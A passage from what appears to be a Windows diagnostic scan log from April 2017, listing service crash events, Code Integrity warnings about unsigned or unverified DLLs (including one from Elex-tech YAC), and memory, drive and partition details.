PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Sync Host_1a082a0 service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service. Error: (04/27/2017 07:29:20 PM) (Source: Service Control Manager) (EventID: 7032) (User: ) Description: The Service Control Manager tried to take a corrective action (Restart the service) after the unexpected termination of the Windows Search service, but this action failed with the following error: An instance of the service is already running. Error: (04/27/2017 07:28:51 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The Steam Client Service service terminated unexpectedly. It has done this 1 time(s). Error: (04/27/2017 07:28:51 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Update Service(FirefoxU) service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 300000 milliseconds: Restart the service. Error: (04/27/2017 07:28:50 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: The Windows Search service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 30000 milliseconds: Restart the service. Error: (04/27/2017 07:28:50 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: The KMS-R@1n service terminated unexpectedly. It has done this 1 time(s). CodeIntegrity: =================================== Date: 2017-04-27 16:52:47.357 Description: Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements. Date: 2017-04-14 22:54:16.521 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2017-04-14 18:38:26.183 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2017-04-12 13:20:37.159 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2017-04-07 13:24:45.442 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2017-04-03 15:24:27.229 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2017-04-01 23:31:02.545 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2017-04-01 23:25:46.100 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2017-04-01 23:14:57.326 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. Date: 2017-04-01 13:06:45.388 Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-7400 CPU @ 3.00GHz Percentage of memory in use: 31% Total physical RAM: 8156.17 MB Available physical RAM: 5546.8 MB Total Virtual: 13276.17 MB Available Virtual: 10305.49 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:77.57 GB) (Free:40.16 GB) NTFS Drive d: () (Fixed) (Total:853.39 GB) (Free:812.01 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 00000000) Partition: GPT. ==================== End of Addition.txt ============================